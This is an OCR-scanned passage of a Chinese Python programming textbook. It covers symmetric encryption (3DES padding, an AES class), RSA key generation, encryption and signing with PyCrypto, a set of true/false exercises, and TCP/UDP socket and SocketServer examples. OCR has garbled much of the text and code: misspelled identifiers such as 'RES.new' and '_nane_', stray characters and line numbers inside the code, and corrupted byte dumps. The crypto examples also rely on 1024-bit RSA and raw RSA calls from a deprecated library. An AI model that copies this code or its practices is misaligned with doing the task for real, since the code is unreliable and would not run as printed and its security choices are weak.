这 个 加 密 程 序 中 通过 在 加 密 内 容 后 部 补 齐 字 节 , 从 而 克服 了 加 密 内 容 必须 是 8 字 节 售 
数 的 限制 , 补 的 字 节 数 为 DES3. block_size-len(chunk) % DES3. block_size, 字 节 的 内 容 为 
chr(pacelen) , 即 编码 为 需要 补足 长 度数 的 Unicode 字符 ,然后 ,使 用 encode('GBK') 把 字符 
串 转 换 为 字 节 码 。 因 为 ,加 密 / 解 密 是 对 字 节 码 进行 的 。 
解密 时 ,需要 把 加 密 时 补 上 的 字 节 删除 掉 , 这 里 做 得 比较 巧妙 , 取 解 码 后 最 后 一 个 字 节 ， 
求 出 它 的 ord() 值 ,该 值 即 是 最 后 要 删除 的 字 节 数 。 
假如 to_enc. txt 文件 的 内 容 是 “this file will be encrypted with DES3 ,中 文 也 可 以 加 密 
的 。”, 则 加 密 后 的 内 容 如 下 : 
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b'\xaa|\xel4\xb0s\x10\xa4\x84n]\xcdA\x99W# \xel5\xcd\x03N\xle\xcf2:\xbfv\x97 — $ \xc14D9\ 
xb7\x0c\x18\xce\x8fp\x89V\xd8by\xbe\xe6\x9b\x96d\xbe\xfb= 1\xb0t\xd2K\xa2\xa4\xfc\xal \n' 


10.2.4 实用 的 AES 加 解密 方法 


上 面 的 例子 中 ,为 了 满足 DES/3DES、AES 算法 的 要 求 , 把 密 钥 的 字 节 长 度 都 设 为 8 字 
节 或 16 字 节 ,加 密 时 用 到 的 初始 值 iv 也 是 在 程序 内 容 直 接 传递 的 。 在 实际 的 加 解密 应 用 
中 ,用 户 设 置 的 密 钥 不 一 定 是 8 字 节 的 倍数 ,iv 也 不 能 直接 传递 ,加 密 的 内 容 也 不 是 加 密 数 
据 块 的 整数 倍 。 怎 么 解决 这 些 问 题 呢 ?下 面 举 一 个 用 AES 加 解密 的 例子 。 

例 [ch10_2_4_AES. py] 


1. import base64 

2. import hashlib 

3. from Crypto import Random 

4. from Crypto.Cipher import AES 

Ss 

6. class AESCipher(object): 

3 

8. def init (self,key): 

9. self.bs = AES.block size 

10. self.key = hashlib. sha256(key. encode()).digest() 
生生 

Ey def encrypt(self, raw): 

13; raw = self. pad(raw) 

14. iv = Random. new().read(AES.block size) 

15; cipher = AES.new(self.key, AES.MODE CBC, iv) 

16. return base64. b64encode( iv + cipher.encrypt(raw)) 
37: 

18. def decrypt(self，enc) : 

19. enc = base64.b64decode(enc) 

20. iv = enc[ :AES.block_size] 

21. cipher = RES.new(self.key，RES.MODE_CBC，iv) 

22. return self._unpad(cipher. decrypt(enc[AES. block_size: ])) 
23. 

24. def _pad(self，s) : 

2 s = bytes(s, 'gbk') 

26. returns + bytes((self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self. 
bs), 'gbk') 

27. 

28. @staticmethod 

29. def unpad(s): 

30. return str(s[: -ord(s[len(s) -1:])],'gbk') 

3 

32. if _nane_==" Wain_': 

33; key = 'mypassword 密 钥 ' 

34. print( ' 密 钥 长 度 :', len(key)) 

35. aescipher = AESCipher(key) 

36. strcode = 'this sentence will be encrypted, 这 里 还 有 中 文 哟 !' 
3 print( ' 加 密 内 容 长 度 :', len(strcode)) 

38. print(" 加 密 前 明文 :"，strcode) 


39. encodetext = aescipher. encrypt(strcode) 
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40. print(" 密 文 :", encodetext) 

41. decodedtext = aescipher. decrypt(encodetext) 
42. print(" 解 密 后 的 明文 :", decodedtext) 

程序 运行 结果 : 

密 钥 长 度 : 12 

加 密 内 容 长 度 : 40 


加 密 前 明文 : this sentence will be encrypted, 这 里 还 有 中 文 哆 ! 

密 文 : b' gbnuZ4YD6MTLY0iiRL4ml1poOSWNhqvImlTw1D + v + hmwZ/OFMBteB106sfeubZHr4fR4wML7Uf + 
DJER2BrCROGjY3/CBt9aiYqEbx1JZSjY4 = 

解密 后 的 明文 : this sentence will be encrypted, 这 里 还 有 中 文 哟 ! 


在 该 段 代 码 中 , 密 钥 可 以 是 任意 内 容 、 任 意 长 度 的 字符 串 ,通过 encode() 方 法 把 字符 串 
转换 为 字 节 码 ,然后 求 字 节 码 的 sha256 值 (长 度 为 32 字 节 ) ,巧妙 地 回避 了 密 钥 的 长 度 限 制 。 
取 数 据 块 长 度 的 随机 数 作为 iv 值 , 并 把 iv 放 到 密 文 的 前 面 , 随 密 文 一 块 儿 传 给 了 解密 者 。 


10.3 非 对 称 加 密 算法 


非 对称 加 密 体 系 中 ,有 一 个 由 公 钥 和 私 钥 组 成 的 密 钥 对 。 用 于 加 密 场 景 时 ,发 送 方 使 用 
接收 方 的 公 钥 加 密 ,接收 方 接 到 密 文 后 ,使 用 自己 的 私 钥 解密 ,在 整个 加 解密 过 程 中 ,接收 方 
的 公 钥 在 网 络 中 是 公开 的 ,不 需要 秘密 地 传递 密 钥 ,从 而 解决 了 对 称 加 密 中 密 钥 的 传递 问 
题 ; 用 于 签名 场景 时 ,发 送 方 用 自己 的 私 钥 签 名 ( 即 加 密 ) ,接收 方 用 发 送 方 的 公 钥 对 签 过 名 
的 数据 进行 验证 , 若 能 顺利 验证 ( 即 解密 ), 则 表明 数据 是 由 公 钥 对 应 的 私 钥 持 有 者 发 出 的 ; 
若 不 能 验证 , 则 表明 数据 不 是 由 公 钥 对 应 的 私 钥 持 有 者 发 出 的 。 非 对 称 加 密 算 法 中 最 有 代 
表 性 的 是 RSA 算法 , 它 的 安全 性 是 基于 一 个 十 分 简单 的 数论 事实 : 将 两 个 大 素数 相 乘 十 分 
容易 ,但 是 想 要 对 其 乘积 进行 因 式 分 解 却 极其 困难 ,因此 可 以 将 乘积 公开 作为 加 密 密 钥 。 
RSA 加 解密 过 程 如 图 10-2 所 示 。 
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生成 密 钥 对 , 用 PyCrypto 生成 密 钥 对 是 非常 容易 的 ,需要 指定 密 钥 的 位 数 ,下 例 中 先 

择 1024 位 ,位 数 越 多 越 安全 ,还 需要 一 个 随机 数 生成 器 ,这 里 使 用 PyCrypto 的 随机 数 模块 
生成 随机 数 。 


>>> from Crypto. PublicKey import RSA 

>>> from Crypto import Random 

>>> random generator = Random.new().read 

>>> key = RSA. generate(1024, random generator) 
>>> public key = key. publickey() 

>>> key 


<_RSAobj @0x314dcf8 n(1024),e,d,p,q,u,private> 


通过 Key 对 象 的 一 些 方法 ,能 够 看 到 它 的 能 力 , 例 如 ,can_encrypt() 函 数 能 检查 该 算法 
的 加 密 能 力 ,can_sign() 函 数 能 检查 该 算法 的 签名 能 力 , 当 私 钥 准 备 就 绪 时 ,has_private() 
函数 会 返回 True 值 。 

>>> key. can_encrypt() 


True 


>>> key. can_sign() 


True 


>>> key. has_private( ) 


True 


10.3.1 加 密 


有 了 密 钥 对 后 ,就 可 以 加 密 数据 了 ,首先 从 密 钥 对 中 提取 公 钥 来 加 密 数据 ,32 是 RSA 
算法 加 密 数据 时 需要 的 随机 参数 。 加 密 时 应 注意 ,要 把 UTF-8 编码 的 字符 串 转换 为 字 
节 码 。 

加 密 : 


>>> enc_data = public key.encrypt('abcdefgh'. encode( 'GBK'), 32) 
>>> enc_data 


(b", \xe8\xab\xf7\xb8\x18\xle7B\xf3\xcf\xfb\xe8 + \x80\xedr\xc2\x81\xe3\xe3 ^\x05\xd2\xd7\ 
x9enss\xacaF\xa7 — \x0b| \x9b1\xc2\x0c\x80u\x94\x81\x86\xe4 | \xec — \x10N\x10\xe8\x98{\xb3\ 
xf0\xbd\x87\xf7\xb50:\xee! E\xa6\xa8\x05\x88\xb9\xfc{\x0e\xe0S\x05FPP\x19 * U\xfa\xa6\xee\ 
xb50\xe0'\xd6sP\xad\x94\xef\x98 = :\xe6\xd1V\xb0\xd7G\xad\xa7\x9aSZ\x8c\x06#\xd8\r\x9e\ 
x16\xabu\xf5\xa8\x82\xlcd\xdd\xa45\xd9", ) 


解密 : 
>>> key. decrypt(enc_data). decode( 'UTF -8') 


'abcdefgh' 


解密 以 后 的 结果 为 字 节 码 ,需要 解码 为 UTF-8 编码 。 


10.3.2 签名 与 验证 


1. 签名 


对 信息 进行 签名 通常 用 于 检查 信息 的 发 布 者 是 否 可 信 , 首 先 计算 信息 的 Hash 值 , 然 后 
把 计算 得 到 的 Hash 值 传 给 RSA 的 sign() 方 法 。 签 名 也 可 以 使 用 DSA 或 者 ElGamal 
算法 。 


>>> from Crypto. Hash import SHA256 

>>> from Crypto. PublicKey import RSA 

>>> from Crypto import Random 

>>> random generator = Random. new().read 

>>> key = RSA. generate(1024, random generator) 
>>> public key = key. publickey() 

>>> text = "abcdefgh' 

>>> hash = SHA256.new(text.encode( ) ).digest() 
>>> hash 


b'\x9cV\xccQ\xb3t\xc3\xba\x18\x92\x10\xd5\xb6\xd4\xbfWy\r5\xlc\x96\xc4|\x02\x19\x0e\xcf\ 
xleC\x065\xab' 


>>> signature = key. sign(hash, '') 


2. 验证 

如 果 知 道 了 对 方 的 公 钥 ,是 很 容易 验证 信息 源 的 。 明 文 与 签名 一 起 发 给 了 接收 方 ,接收 
方 计算 明文 的 Hash 值 , 然 后 用 公 钥 验证 信息 是 否 来 自发 送 方 。 

>>> text = 'abcdefgh' 


>>> hash = SHA256.new(text.encode( )).digest() 
>>> public_key. verify(hash, signature) 


True 
习 题 

判断 题 

1. MD5 算法 生成 的 摘要 值 是 128 位 。 ( ) 

2. SHA-1 算法 生成 的 摘要 值 是 256 位 。 ( ) 

3. 3DES 必须 使 用 三 个 密 钥 。 ( ) 

4. AES 算 法 被 加 密 的 数据 应 该 是 16 字 节 的 倍数 。 ( 

5. 使 用 对 称 加 密 算 法 时 ,车 被 加 密 的 数据 块 长 度 不 是 16 的 倍数 , 则 需要 用 字符 补 齐 。 
( ) 

6. 非 对 称 加 密 算法 中 , 密 钥 有 两 个 ,一 个 为 私 钥 ; 另 一 个 为 公 钥 。 (¢ ) 


7. 非 对 称 加 密 算法 既 可 以 用 于 加 密 数 据 , 也 可 以 用 于 签名 。 《 ) 


11.1 Socket 编程 


在 网 络 编程 中 广泛 使 用 的 是 网 络 套 接 字 Socket, 那 什么 是 套 接 字 呢 ? 套 接 字 来 源 于 美 
国 加 利 福 尼 亚 大 学 伯克利 分 校 开 发 的 UNIX 版 本 , 即 常 说 的 BSD UNIX, 开 始 时 ,BSD 套 接 
字 用 于 在 多 个 应 用 程序 的 进程 间 进 行 通信 , 套 接 字 分 为 文件 型 和 网 络 型 两 大 类 。 在 设置 套 
接 字 类 型 时 ,UNIX 套 接 字 为 AF_UNIX, 其 意思 是 地 址 家 族 UNIX。 除 此 之 外 ,还 有 基于 网 
络 的 套 接 字 类 型 : AF_INET, 即 地 址 家 族 Internet 之 意 ,AF_INET6 即 用 IPv6 版 的 网 络 上 
的 寻 址 ,还 有 其 他 一 些 套 接 字 类 型 ,要 么 专用 于 某 一 平台 ,要 么 已 经 被 废止 ,很 少 用 到 ,这 里 
就 不 再 介绍 ,常用 的 类 型 主要 是 以 上 三 种 。 

在 网 络 世 界 中 被 熟知 的 有 两 种 模型 , 即 OSI 参考 模型 和 TCP/IP 参考 模型 ,这 两 种 参考 
模型 都 采用 了 分 层 的 思想 ,把 网 络 分 为 多 层 , 上 层 调用 下 层 的 服务 ,下 层 为 上 层 提供 服务 ,上 
层 和 下 层 之 间 通 过 接口 实现 调用 ,相同 层次 是 通过 下 层 提 供 的 服务 实现 透明 通信 。OSI 参 
考 模型 由 于 体系 过 于 宠 大 ,实现 起 来 较为 困难 ,而 TCP/IP 因 其 结构 简单 ,容易 实现 ,已 成 为 
网 络 界 事实 上 的 标准 ,本 书 讲述 的 编程 都 是 基于 TCP/IP 参考 模型 的 。 

在 TCP/IP 参考 模型 中 使 用 的 协议 是 TCP/IP, 即 Transmission Control Protocol/ 
Internet Protocol ,中 文 名 称 为 传输 控制 协议 /互联 网 互 连 协议 。 在 TCP/IP 协议 簇 中 有 两 
个 重要 的 协议 , 即 TCP 和 UDP。TCP 是 面向 连接 的 ,对 数据 传输 提供 了 差错 控制 。TCP 
传输 数据 之 前 通过 “三 次 握手 ”建立 连接 ,数据 传输 完成 后 ,通过 “四 次 挥手 ” 断 掉 连 接 。 要 创 
建 TCP 套 接 字 需要 指定 套 接 字 的 类 型 SOCK_STREAM。 

另 一 个 协议 为 UDP, 即 User Datagram Protocol, 中 文 名 为 用 户 数据 报 协 议 , 它 是 一 种 
无 连接 的 传输 层 协 议 ,提供 面向 事务 的 简单 不 可 靠 信息 传送 服务 ,UDP 在 传输 前 不 需要 建 
立 连接 ,传输 数据 的 可 靠 性 顺序 性 无 重复 性 等 都 得 不 到 保证 .但 它 传输 数据 的 开销 较 小 ， 
能 够 提供 较 好 的 性 能 。UDP 在 套 接 字 编 程 中 的 类 型 值 为 SOCK_DGRAM, 意思 就 是 
datagram, 即 数据 报 。 

套 接 字 中 使 用 主机 和 端口 作为 地 址 ,这 里 的 主机 可 以 是 IP 地 址 ,或 者 是 主机 名 ,主机 名 
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通过 DNS 系统 可 以 转化 为 IP 地 址 ,计算 机 系统 中 的 应 用 程序 是 通过 端口 与 其 他 应 用 程序 
进行 通信 的 。 如 果 把 IP 地 址 比 作 一 栋 大 楼 ,端口 就 是 通 往 大 楼 内 各个 房间 的 门 。 真 正 的 大 
楼 内 房间 数 是 有 限 的 ,但 是 一 个 IP 地 址 的 端口 可 以 有 65536( 即 2”) 个 之 多 。 端 口 是 通 过 端 
口号 来 标记 的 ,端口 号 只 有 整数 ,范围 是 从 0 一 65535(25 一 1) 。 这 些 端口 分 为 周知 端口 (1 一 
1023) ,如 其 中 80 端口 分 配给 WWW 服务 ,21 端口 分 配给 FTP 服务 等 ; 注册 端口 (1024 一 
49151) ,分 配给 用 户 进 程 或 应 用 程序 ; 动态 端口 (49152 一 65535) ,之 所 以 称 为 动态 端口 ,是 
因为 它 一 般 不 固定 分 配给 某 种 服务 ,而 是 动态 分 配 的 。 


11.1.1 TCP 套 接 字 编程 


1. TCP 套 接 字 编程 步骤 

Python 提供 了 完整 的 套 接 字 编程 架构 。 套 接 字 编 程 是 基于 服务 器 端 / 客 户 端 模式 的 ， 
在 服务 器 端 运行 着 一 种 服务 程序 , 它 默默 地 等 待 着 客户 的 服务 请 求 ,客户 到 来 后 为 客户 提供 
服务 ,服务 完成 后 ,等 待 其 他 客户 的 来 临 。 

套 接 字 模块 是 一 个 非常 简单 的 基于 对 象 的 接口 , 它 提 供 对 低层 BSD 套 接 字样 式 网 络 的 
访问 ,使 用 该 模块 可 以 实现 客户 端 和 服务 器 端 套 接 字 连接 。 要 在 Python 中 建立 具有 TCP 
和 流 套 接 字 的 简单 服务 器 端 ,需要 使 用 Socket 模块 , 即 import socket, 一 般 情 况 下 用 from 
socket import * ,把 Socket 模块 里 的 所 有 属性 都 导入 命名 空间 里 面 来 ,这 样 能 大 幅 缩减 代 
码 。 利 用 该 模块 包含 的 函数 和 类 定义 ,可 生成 通过 网 络 通信 的 程序 。 一 般 来 说 ,建立 服务 器 
端 连接 需要 以 下 六 个 步骤 。 

(1) 创建 Socket 对 象 。 

调用 socket() 构 造 函 数 。 


socket = socket. socket (family, type) 


family 的 值 可 以 是 AF_UNIX(UNIX 域 . 用 于 同一 台 机 器 上 的 进程 间 通 信 ), 也 可 以 是 
AF_INET( 用 于 IPv4 协议 的 TCP 和 UDP) 。 至 于 type 参数 ,SOCK_STREAM( 流 套 接 字 ) 
或 者 SOCK_DGRAM( 数 据 报 文 套 接 字 )、SOCK_RAW(raw 套 接 字 ) ,如 tcpServSocket 一 
socket(AF_INET,SOCK_STREAM) ,表示 使 用 互联 网 地 址 家 族 ,TCP 流 套 接 字 进行 
连接 。 

(2) 将 socket 绑 定 (指派 ) 到 指定 地 址 上 。 


socket. bind(address) 


address 必须 是 一 个 双 元 素 元 组 ((host,port)), 即 主机 名 或 者 IP 地 址 十 端口 号 。 如 果 
端口 号 正在 被 使 用 或 者 保留 ,或 者 主机 名 或 IP 地 址 错误 , 则 引发 socke. error 异常 。 如 : 


tcpServSocket. bind( ('localhost', 1234)) 
(3) 使 用 listen() 方 法 监听 客户 的 请 求 。 
socket. listen(backlog) 


backlog 指定 了 最 多 连接 数 ,至 少 为 1, 接 到 连接 请 求 后 ,这 些 请 求 必须 排队 ,如 果 队 列 
已 满 , 则 拒绝 请 求 。 如 : 


196) Python 编程 入 门 与 案例 详解 


tcpServSocket. listen(10) 
(4) 服务 器 端 套 接 字 通过 socket 的 accept() 方 法 等 待 客户 请 求 一 个 连接 : 
tcpClientSock, address = socket.accept() 


调用 accept() 方 法 时 ,socket 会 进入 'waiting'( 或 阻塞 ) 状 态 。 客 户 请 求 连接 时 ,方法 建 
立 连接 并 返回 服务 器 端 。 accept( ) 方 法 返回 一 个 含有 两 个 元 素 的 元 组 , 形 如 
(tcpClientSock,address)。 第 一 个 元 素 (tcpClientSock) 是 新 的 socket 对 象 ,服务 器 端 通过 
它 与 客户 端 通信 ; 第 二 个 元 素 (address) 是 客户 端的 互联 网 地 址 。 

(5) 服务 器 端 和 客户 端 通过 send() 和 recv() 方 法 通信 (传输 数据 )。 服 务 器 端 调用 send 
() 方 法 ,并 采用 字 节 字符 串 形式 向 客户 发 送信 息 。send() 方 法 返回 已 发 送 的 字符 个 数 。 服 
务 器 端 使 用 recv() 方 法 从 客户 接收 信息 。 调 用 recv() 方 法 时 ,必须 指定 一 个 整数 来 控制 本 
次 调用 所 接收 的 最 大 数据 量 。recv() 方 法 在 接收 数据 时 会 进入 'blocket' 状 态 ,最 后 返回 一 个 
字 节 字符 串 , 用 它 来 表示 收 到 的 数据 。 如 果 发 送 的 量 超过 recv() 方 法 所 允许 ,数据 会 被 截 
断 。 多 余 的 数据 将 缓冲 于 接收 端 。 以 后 调用 recv() 方 法 时 ,多 余 的 数据 会 从 缓存 区 删除 。 

(6) 传输 结束 后 ,服务 器 端 调用 socket 的 close() 方 法 以 关闭 连接 。 


tcpServSocket. close( ) 


建立 一 个 简单 客户 连接 则 需要 以 下 四 个 步骤 。 
(1) 创建 一 个 Socket 对 象 ,以 连接 服务 器 。 


Socket = socket. socket(family,type) 


参数 同 服务 器 端 ,如 tcpClientSock = socket(AF_INET,SOCK_STREAMD) 。 
(2) 连接 服务 器 端 。 使 用 socket 的 connect() 方 法 连接 服务 器 端 。 


socket. connect( (host, port) ) 


如 tcpClientSock. connect(('localhost',1234) ) 。 

(3) 调用 send() 和 recv() 方 法 通信 。 

(4) 通信 结束 后 ,客户 通过 调用 socket 的 close() 方 法 关闭 连接 。 
如 tcpClientSock. close() 。 


2. 服务 器 端 程序 


下 面 建立 一 个 简单 的 服务 器 端 套 接 字 程 序 ,实现 把 用 户 的 输入 信息 传输 给 客户 端 。 
例 [chll 1 1 tcpSs.py] 


from socket import * 


1 

2 

3. hbost = ” 

4.，# 指 定 主机 

5. port = 21234 

6. 井 指 定 端口 号 

了 BUFFERS = 1024 

8. 井 指定 缓存 区 大 小 

9 tcpServSocket = socket(AF_INET,SOCK STREAM) 
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# 建 立 一 个 互联 网 地 址 家 族 的 TCP 流 套 接 字 


. tcpServSocket. bind( (host, port)) 


。 井 绑 定 到 由 (host,port) 元 组 指定 的 地 址 上 
. tcpServSocket. listen(10) 


# 对 指定 地 址 进行 监听 ,最 大 连接 数 为 10 


.print(" 等 待 连接 中 ……") 
. tcpClientSock , address = tcpServSocket.accept() 
， 井 调用 accept() 方 法 时 , socket 会 进入 "waiting'( 或 阻塞 ) 状 态 


#tcpClientSock 为 客户 端 套 接 字 ,address 为 客户 端 地 址 


.print(" 已 经 与 {} 建 立 连接 ". format(address)) 
. while True: 


recieveddata = tcpClientSock. recv(BUFFERS) 
# 接收 客户 端 发 送 过 来 的 数据 
print(recieveddata. decode( 'UTF ~- 8')) 
# 对 接收 到 的 数据 进行 0TF - 8 解码 
if not len(recieveddata) : 

tcpClientSock. close( ) 

break 
# 如 果 客 户 端 发 送 过 来 的 数据 为 空 , 则 退出 循环 
senddata = input(" 请 输入 要 发 送 的 数据 >") 
if not len( senddata): 

break 
# 如 果 发 送 的 数据 为 空 , 则 退出 循环 
tcpClientSock. sendall( senddata. encode( 'UTF — 8')) 
# 把 输入 的 数据 进行 UTF - 8 编码 后 , 发 送 给 客户 端 


. tcpServSocket. close() 
。# 传 送 完成 后 ,关闭 连接 


3. 客户 端 程序 
例 [chll_1_ ltcpSC.py】 


from socket import 关 


HOST = 'localhost' 
PORT = 21234 
BUFFERS = 1024 
tcpClientSock = socket(AF_INET,SOCK STREAM) 
tcpClientSock. connect( (HOST, PORT) ) 
# 连接 到 (HOST, PORT) 指 定 的 地 址 
while True: 
inputdata = input(" 请 输入 要 发 送出 去 的 数据 >") 
if not inputdata : 
break 
tcpClientSock. sendall( inputdata. encode( 'UTF — 8')) 
# 把 输入 的 数据 用 UTF - 8 编码 后 ,发 送 给 服务 端 
recieveddata = tcpClientSock. recv(BUFFERS) 
# 从 服务 端 接收 数据 ,缓存 区 大 小 由 常量 BUFFERS 指定 
if not recieveddata: 
break 
# 若 接收 到 的 数据 长 度 为 零 , 则 退出 循环 
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20. print(" 接 收 的 数据 是 : ",recieveddata. decode('UTE - 8')) 
2 ## 对 接收 到 的 数据 用 UTF - 8 解码 后 输出 

22. tcpClientSock. close() 

23. # 关 闭 连接 


服务 器 端 运行 情况 : 
D:\pythonproj > python tcpss. py 


等 待 连接 中 … 

已 经 与 ('127.0.0.1'，54452) 建 立 连接 
abcdefg 

请 输入 要 发 送出 去 的 数据 > 你 好 ,数据 已 经 收 到 
谢谢 

请 输入 要 发 送出 去 的 数据 > 


D:\pythonproj > 


客户 端 运行 情况 : 
D:\pythonproj > python tcpsc. py 


请 输入 要 发 送出 去 的 数据 > abcdefg 
接收 的 数据 是 : 你 好 ,数据 已 经 收 到 
请 输入 要 发 送出 去 的 数据 > 谢谢 


D:\pythonproj > 


从 以 上 运行 情况 可 以 看 出 ,服务 器 端 程序 首先 运行 ,监听 指定 地 址 (主机 十 端口 ) ,等待 
客户 的 连接 。 客 户 端 连接 到 服务 器 端 ,输入 字符 串 ,经 UTF-8 编码 转换 成 字 节 码 后 传送 给 
服务 器 端 。 服 务 器 端 接收 客户 端 传送 的 字 节 码 字 符 串 后 ,解码 输出 。 然 后 把 用 户 输入 的 字 
符 串 编码 后 传送 给 客户 端 。 不 管 是 服务 器 端 还 是 客户 端 ,在 接收 和 发 送 过 程 中 一 直 处 在 等 
待 状况 , 即 所 谓 的 “阻塞 状态 ”这 种 通信 方式 的 效率 是 十 分 低下 的 ,并 且 服 务 器 端 不 能 接受 
其 他 客户 的 连接 。 


11.1.2 UDP 套 接 字 编程 


1. UDP 套 接 字 编 程 步骤 

上 文中 已 经 讲 过 .UDP 不 是 面向 连接 的 ,所 以 连接 是 不 可 靠 的 ,但 它 的 效率 较 高 。 编 程 
时 UDP 不 用 进行 过 多 的 设置 .直接 等 待 客户 端的 连接 。 

服务 器 端的 编程 过 程 如 下 。 

(1) 创建 服务 器 端 套 接 字 。 

socket = socket (family, SOCK_ DGRAM) 


(2) 绑 定 到 指定 地 址 。 


socket. bind( ADDR) 
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(3) 在 循环 中 接收 /发 送 数据 。 
socket. sentto( )/socket. recvfrom() 
(4) 关闭 连接 。 

socket. close() 


客户 端的 编程 过 程 如 下 。 
(1) 创建 客户 端 套 接 字 。 


socket (family, SOCK_DGRAM) 

(2) 在 循环 中 接收 /发 送 数据 。 
udpClientSocket. sendto( data, ADDR) 
或 

udpClientSocket. recvfrom( BUFFERS) 


(3) 关闭 连接 。 


udpClientSocket. close() 


2. 服务 器 端 程 序 
例 [chll 1 2_ udps.py】 


from socket import 关 


E 

2 

3. HOST = "" 
4. PORT = 21234 

5. BUFFERS = 1024 

6 ADDR = (HOST, PORT) 

7. # 指 定 主机 + 端口 形成 的 元 组 地 址 

8. udpServSocket = socket(AF_ INET,SOCK DGRAM) 

9. 井 建立 一 个 互联 网 地 址 家 族 的 UDP 用 户 数 据 报 套 接 字 
10. udpServSocket. bind(ADDR) 

11， 井 绑 定 到 指定 地 址 

12. print( ' 等 待 传输 中 …… )) 


13. while True: 


14. recveddata, udpClientAddr = udpServSocket. recvfrom(BUFFERS) 

is # 从容 户 端 接收 数据 ,返回 两 个 参数 ,一 个 为 返回 参数 ; 另 一 个 为 客户 端 地 址 
16. if not recveddata: 

17 break 

18. # 如 果 返 回 的 数据 为 空 , 则 退出 循环 

19. print( ' 收 到 的 数据 是 : % s' % recveddata. decode( 'UTF - 8')) 

20. inputdata = input(' 输 入 数据 >') 

21. udpServSocket. sendto( inputdata. encode( 'UTF ~ 8'), udpClientAddr) 


22; 井 将 输入 的 数据 传输 给 客户 端 , sendto( ) 有 两 个 参数 : 一 个 是 要 传输 的 数据 ; 另 一 个 是 客户 


2 # 数 据 经 UTF - 8 编码 后 转换 为 字 节 码 字 符 串 
24. udpServSocket. close() 
25. 井 关闭 套 接 字 
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3. 客户 端 程序 
例 [chll 1 2_udpc.py】 


一 关 一 encoding:utf 一 8 一 * 一 


from socket import * 


2 

| 

4. HOST = 'localhost" 

本 指定 一 台 主 机 

6 PORT = 21234 

了 指定 一 个 端口 

8 BUFFERS = 1024 

9. 指定 缓冲 区 大 小 

10. RDDR = (HOST,PORT) 

11，# 形 成 一 个 地 址 元 组 

12. udpClientSocket = socket(AF_INET,SOCK DGRAM) 
13， 井 形成 一 个 互联 网 地 址 家 族 用 户 数据 报 套 接 字 
14. while True: 








15. inputdata = input(' 输 入 数据 >') 

16. udpClientSocket. sendto( inputdata. encode( 'UTF - 8'), ADDR) 
17. # 将 输入 的 数据 经 UET- 8 编码 后 ,发 送出 去 

18, if not len( inputdata) : 

19. break 

20. recveddata, RDDR = udpClientSocket. recvfrom(BUFFERS) 
5 井 从 服务 端 接收 数据 

22 if not len(recveddata) : 

23, break 

24. print(recveddata. decode( 'UTF ~ 8')) 


25. # 将 接收 到 的 数据 经 UPT- 8 解码 后 输出 
26. udpClientSocket. close() 
27，# 关 闭 套 接 字 


服务 器 端 运行 结果 : 

D:\pythonproj > python chll ~ 1— 2— udps.py 
收 到 的 数据 是 : abcd 

输入 数据 > 收 到 

收 到 的 数据 是 : 我 要 退出 

输入 数据 > 好 的 


D:\pythonproj > 


客户 端 运行 结果 : 


D:\pythonproj > python chl1 ~ 1— 2— udpc.py 
输入 数据 > abcd 
收 到 


第 11 章 ”网络 编程 (201) 


输入 数据 > 我 要 退出 
好 的 
输入 数据 > 


D:\pythonproj > 


11.2 ”SocketServer 模块 


在 前 面 使 用 Socket 的 过 程 中 , 先 设置 了 Socket 的 类 型 ,然后 依次 调用 bind() \listen() 、 
accept() 函 数 , 最 后 使 用 while 循环 来 让 服务 器 不 断 地 接受 请 求 。 在 Python 标准 库 中 还 提 
供 了 另外 一 个 模块 SocketServer, 它 简化 了 Python 的 Socket 服务 器 的 编程 , 它 基 于 Socket 
提供 了 一 套 快 速 建立 Socket 服务 器 端的 框架 ,并 可 以 通过 Mix-In 的 技巧 让 单线 程 服务 器 
进化 为 多 线程 或 多 进程 服务 器 。 

SocketServer 有 4 个 类 : TCPServer、UDPServer、UNIXStreamServer、UNIXDatagramServer。 
这 4 个 类 是 支持 同步 通信 的 ,另外 通过 ForkingMixIn 和 ThreadingMixIn 类 来 支持 异步 
通信 。 

创建 服务 器 的 步骤 如 下 。 

(1) 首先 必须 创建 一 个 请 求 处 理 类 , 它 是 BaseRequestHandler 的 子 类 并 重 载 其 handle() 
方法 。 

(2) 实例 化 一 个 服务 器 类 ,传人 服务 器 的 地 址 和 请 求 处 理 程 序 类 。 

(3) 调用 handle_request() (一 般 是 调用 其 他 事件 循环 或 者 使 用 select() 方 法 ) 或 serve_ 
forever() 。 

集成 ThreadingMixIn 类 时 需要 处 理 异常 关闭 。daemon_threads 指示 服务 器 是 否 要 等 
待 线程 终止 ,要 是 线程 相互 独立 ,必须 设置 为 True, 默 认 是 False。 

无 论 用 什么 网 络 协议 ,服务 器 类 有 相同 的 外 部 方法 和 属性 。 

1. 服务 器 类 型 

共有 5 种 服务 器 类 型 ,它们 是 BaseServer、TCPServer、 UNIXStreamServer、 UDPServer、 
UNIXDatagramServer。 其 中 ,BaseServer 是 基础 类 ,不 直接 对 外 服务 。 

2. 服务 器 对 象 

9 class SocketServer. BaseServer: 这 是 模块 中 的 所 有 服务 器 对 象 的 超 类 。 它 定义 了 接 

口 , 如 下 所 述 , 但 是 大 多 数 的 方法 不 实现 ,在 子 类 中 进行 细 化 。 

9 BaseServer. fileno(): 返回 服务 器 监听 套 接 字 的 整数 文件 描述 符 。 通 常用 来 传递 给 

select. select() 方 法 ,以 允许 一 个 进程 监视 多 台 服 务 器 。 

4 BaseServer. handle_request(): 处 理 单个 请 求 。 处 理 顺 序 . get_request()、verify_ 

request() 、process_request()。 如 果 用 户 提 供 handle() 方 法 抛 出 异常 ,将 调用 服务 器 
的 handle_error() 方 法 。 如 果 self. timeout 内 没有 收 到 请 求 ,将 调用 handle_timeout() 方 
法 并 返回 handle_request() 方 法 。 

2 BaseServer. server_forever (poll_interval 二 0. 5): 处 理 请 求 , 直到 一 个 明确 的 
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shutdown() 方 法 请 求 。 每 poll_interval s 轮 询 一 次 shutdown。 忽 略 self. timeout。 
如 果 需 要 做 周期 性 的 任务 ,建议 放置 在 其 他 线程 。 

9 BaseServer. shutdown(): 告诉 server_forever() 循 环 停止 并 等 待 其 停止 。Python 2. 6 
版 本 。 

2 BaseServer. address_family: 地 址 家 族 ,如 socket. AF_INET 和 socket. AF_UNIX。 

2 BaseServer. RequestHandlerClass: 用 户 提供 的 请 求 处 理 类 ,这 个 类 为 每 个 请 求 创建 
实例 。 

9 BaseServer. server_address: 服务 器 侦 听 的 地 址 。 格 式 根据 协议 家 族 地 址 的 各 不 相 
同 , 请 参阅 Socket 模块 的 文档 。 

9 BaseServer. socketSocket: 服务 器 上 侦 听 传人 的 请 求 Socket 对 象 的 服务 器 。 

